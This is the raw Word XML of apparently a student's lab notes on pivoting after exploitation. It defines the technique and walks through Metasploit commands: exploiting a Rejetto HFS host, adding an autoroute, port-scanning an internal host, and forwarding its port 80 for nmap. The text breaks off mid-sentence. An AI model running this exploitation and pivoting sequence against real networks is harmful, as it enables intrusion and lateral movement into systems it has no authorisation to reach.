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F31F" w14:textId="30590D5B" w:rsidR="00853ABF" w:rsidRPr="001B46E1" w:rsidRDefault="001B46E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B46E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pivoting</w:t>
      </w:r>
      <w:r w:rsidRPr="001B46E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2AA52F" w14:textId="77777777" w:rsidR="001B46E1" w:rsidRDefault="001B46E1"/>
    <w:p w14:paraId="51D5047E" w14:textId="03DBD91B" w:rsidR="007646FA" w:rsidRDefault="007646FA">
      <w:r>
        <w:t>Post exploitation techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290095B6" w14:textId="77777777" w:rsidR="007646FA" w:rsidRDefault="007646FA"/>
    <w:p w14:paraId="4B7771AC" w14:textId="77777777" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007646FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is pivoting?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4050AED3" w14:textId="4967BBA6" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:r w:rsidRPr="007646FA">
        <w:t xml:space="preserve">Pivoting = using a compromised Windows machine as a </w:t>
      </w:r>
      <w:r w:rsidRPr="007646FA">
        <w:t>steppingstone</w:t>
      </w:r>
      <w:r w:rsidRPr="007646FA">
        <w:t xml:space="preserve"> to reach other hosts/networks that you (the attacker) cannot access directly.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (internal network)</w:t>
      </w:r>
      <w:r w:rsidRPr="007646FA">
        <w:br/>
        <w:t>Goal: route traffic through the compromised host so you can scan, access services, or exploit machines on the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F983C" w14:textId="77777777" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007646FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When you use it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72902FDA" w14:textId="77777777" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007646FA">
        <w:t>Target A (compromised) can talk to Target B (internal</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007646FA">
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007646FA">
        <w:t xml:space="preserve"> but you cannot from your attacker box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2088BA5B" w14:textId="77777777" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007646FA">
        <w:t>You want to reach internal-only services (RDP, SMB, HTTP) behind a firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861E7C9" w14:textId="77777777" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007646FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common pivot techniques on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05E2BD" w14:textId="77777777" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007646FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="007646FA">
        <w:t xml:space="preserve"> (forward a remote service to a local port on your attacker machine).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD82289" w14:textId="77777777" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007646FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Route/autoroute + proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="007646FA">
        <w:t xml:space="preserve"> (add network routes and use a SOCKS proxy through the session).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1AC3F" w14:textId="77777777" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007646FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VPN/tunnel</w:t>
      </w:r>
      <w:r w:rsidRPr="007646FA">
        <w:t xml:space="preserve"> (create an encrypted tunnel through the compromised host).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7829DBDA" w14:textId="77777777" w:rsidR="007646FA" w:rsidRPr="007646FA" w:rsidRDefault="007646FA" w:rsidP="007646FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007646FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy via remote tools</w:t>
      </w:r>
      <w:r w:rsidRPr="007646FA">
        <w:t xml:space="preserve"> (use built-in or installed proxies on the compromised host).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372290B2" w14:textId="77777777" w:rsidR="007646FA" w:rsidRDefault="007646FA"/>
    <w:p w14:paraId="011A0AFF" w14:textId="77777777" w:rsidR="002364DF" w:rsidRDefault="002364DF"/>
    <w:p w14:paraId="36663100" w14:textId="170E7B7B" w:rsidR="001B46E1" w:rsidRPr="004675D5" w:rsidRDefault="004675D5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004675D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visual representation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B96F3" w14:textId="77777777" w:rsidR="004675D5" w:rsidRDefault="004675D5"/>
    <w:p w14:paraId="3C6B6F5B" w14:textId="744CDEAE" w:rsidR="004675D5" w:rsidRDefault="004675D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4407BA8A" wp14:editId="390842FC">
            <wp:extent cx="4341412" cy="2534173"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7838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1843" name="Picture 7838918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70" cy="25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7216" w14:textId="77777777" w:rsidR="004675D5" w:rsidRDefault="004675D5"/>
    <w:p w14:paraId="0C04C258" w14:textId="77777777" w:rsidR="004675D5" w:rsidRDefault="004675D5"/>
    <w:p w14:paraId="215C1399" w14:textId="65A447CB" w:rsidR="00493D78" w:rsidRPr="00493D78" w:rsidRDefault="00493D78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00493D78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79209263" w14:textId="77777777" w:rsidR="00493D78" w:rsidRDefault="00493D78"/>
    <w:p w14:paraId="183D1FE4" w14:textId="3D041031" w:rsidR="00150B4D" w:rsidRDefault="00150B4D">
      <w:r>
        <w:t>Ping victim_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D415E0" w14:textId="1A4E61D2" w:rsidR="00150B4D" w:rsidRDefault="00150B4D">
      <w:r>
        <w:t># reached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F991F" w14:textId="42859914" w:rsidR="00150B4D" w:rsidRDefault="00150B4D">
      <w:r>
        <w:t>Ping victim</w:t>
      </w:r>
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081DD87C" w14:textId="3326CFBB" w:rsidR="00150B4D" w:rsidRDefault="00150B4D">
      <w:r>
        <w:t># not reached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503DC286" w14:textId="77777777" w:rsidR="00493D78" w:rsidRDefault="00493D78"/>
    <w:p w14:paraId="6CBC1900" w14:textId="61F0BF25" w:rsidR="00150B4D" w:rsidRDefault="00150B4D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64E3DD85" w14:textId="69896C4F" w:rsidR="00150B4D" w:rsidRDefault="00150B4D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B1F88F" w14:textId="43701630" w:rsidR="00150B4D" w:rsidRDefault="00150B4D">
      <w:r>
        <w:t>Workspace -a pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E74775" w14:textId="744B0668" w:rsidR="00150B4D" w:rsidRDefault="00150B4D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victim_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6D3347" w14:textId="007F9EA0" w:rsidR="00150B4D" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6953BD37" w14:textId="2C016134" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Use (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rejetto_hfs_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714864E6" w14:textId="68CC22BE" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7821F2EC" w14:textId="48C49AD5" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Set RHOSTS victim_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDD6C7C" w14:textId="11492DF2" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDAF6E2" w14:textId="0EF5E0C1" w:rsidR="00341CCD" w:rsidRDefault="00341CCD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  <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F87D028" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="5D22BC26" w14:textId="1DB389FF" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="615705D9" w14:textId="42C345BB" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C371F6" w14:textId="6261F85E" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> victim_1 is also part of the internal network </w:t>
      </w:r>
      <w:r w:rsidR="00EA34F2">
        <w:t>so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we can copy the Ip of internal network and add the route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F98E6C" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="0845473E" w14:textId="4427F44D" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Run autoroute -s victim_2/20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13726AF0" w14:textId="5549FABB" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t xml:space="preserve">Add the route to that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>particular subnet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2178716B" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="2C68A2AF" w14:textId="272638A0" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFAFC6" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="27955E90" w14:textId="78ACF464" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CE094" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="16B79DC3" w14:textId="3D640526" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Sessions -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A7F50" w14:textId="51A20149" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t># help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E45D399" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="020ABDD1" w14:textId="137BE1F2" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>n victim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DAAD64" w14:textId="711323F8" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t xml:space="preserve"># it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the name of (id e.g,1,3,4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) to victim_1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A6EC4" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="4FF437E6" w14:textId="12955740" w:rsidR="00AC1763" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> route </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is only be</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> applicable to</w:t>
      </w:r>
      <w:r w:rsidR="00AC1763">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC1763">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC1763">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> modules</w:t>
      </w:r>
      <w:r w:rsidR="00AC1763">
        <w:t xml:space="preserve"> we can use,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> no</w:t>
      </w:r>
      <w:r w:rsidR="00AC1763">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>extern</w:t>
      </w:r>
      <w:r w:rsidR="00EA34F2">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>l tools</w:t>
      </w:r>
      <w:r w:rsidR="00AC1763">
        <w:t xml:space="preserve"> can be used in the route added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00E773" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="447F0BBB" w14:textId="161835B5" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="282F6882" w14:textId="17AD0E0B" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ECFCFA" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="66980A03" w14:textId="6019E017" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A592EB6" w14:textId="5C91CD05" w:rsidR="00341CCD" w:rsidRDefault="00341CCD">
      <w:r>
        <w:t>Set RHOSTS victim_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF7F6A8" w14:textId="7D0991BF" w:rsidR="00341CCD" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t>Set PORT 1-100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0AA27" w14:textId="0171ECF7" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767AD00C" w14:textId="58411A96" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F4F11" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:p w14:paraId="78DEA68B" w14:textId="77777777" w:rsidR="00341CCD" w:rsidRDefault="00341CCD"/>
    <w:p w14:paraId="4F57BD7D" w14:textId="69CFC6DA" w:rsidR="00341CCD" w:rsidRPr="00AC1763" w:rsidRDefault="00AC1763">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1763">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open the browser:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1763">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D03673" w14:textId="6E10EFA7" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t xml:space="preserve">Enter victim_2 we cannot access as the route is only added to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAAB940" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:p w14:paraId="1CFA6771" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:p w14:paraId="34330CB9" w14:textId="28F3591E" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t xml:space="preserve"># to run the Nmap on the victim_2 we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1763">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidR="00535488" w:rsidRPr="00AC1763">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>forwarding</w:t>
      </w:r>
      <w:r w:rsidR="00535488">
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on victim_2 to a local port on our local host (attacker machine) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413C699" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:p w14:paraId="0C933C98" w14:textId="37AC41F9" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD556C9" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:p w14:paraId="1FC0FCCE" w14:textId="367F634F" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Portfwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> add -l </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1234  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>p 80 -r victim_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F74F4E4" w14:textId="5E381A8C" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we cannot perform the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan on the victim_2 </w:t>
      </w:r>
      <w:r w:rsidR="00535488">
        <w:t>directly we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> need to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the port forwarding as it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>allow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> us to forward remote port 80 to the local port (attacker) </w:t>
      </w:r>
      <w:r w:rsidR="00535488">
        <w:t>1234,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>allow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> us </w:t>
      </w:r>
      <w:r w:rsidR="00535488">
        <w:t>to perform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> service version enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EECD8C" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:p w14:paraId="3479130B" w14:textId="0A1FFECE" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4B294" w14:textId="77777777" w:rsidR="00AC1763" w:rsidRDefault="00AC1763"/>
    <w:p w14:paraId="0437B282" w14:textId="7BCC98F9" w:rsidR="00AC1763" w:rsidRDefault="00AC1763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gramStart"/>
      <w:r>
        <w:t>p  1234</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C50CB55" w14:textId="051CD9A4" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t xml:space="preserve"># -p 1234 as </w:t>
      </w:r>
      <w:r w:rsidR="00535488">
        <w:t>we forward</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> remote port 80 to the local port (attacker) 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF381D" w14:textId="390D1F18" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t xml:space="preserve"># localhost as this is on </w:t>
      </w:r>
      <w:r w:rsidR="00535488">
        <w:t>our</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kali system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB07E23" w14:textId="7560200F" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> # it gives the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C273165" w14:textId="795E0CFA" w:rsidR="00AC1763" w:rsidRDefault="00AC1763">
      <w:r>
        <w:t xml:space="preserve"># we do port forwarding to </w:t>
      </w:r>
      <w:r w:rsidR="0056709C">
        <w:t xml:space="preserve">identify </w:t>
      </w:r>
      <w:r w:rsidR="00535488">
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="0056709C">
        <w:t xml:space="preserve"> service is running on the victim_2 port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419E870" w14:textId="77777777" w:rsidR="0056709C" w:rsidRDefault="0056709C"/>
    <w:p w14:paraId="3C2FEB2C" w14:textId="20DC1E8C" w:rsidR="0056709C" w:rsidRPr="0056709C" w:rsidRDefault="0056709C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0056709C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0056709C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0056709C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> can also </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0056709C">
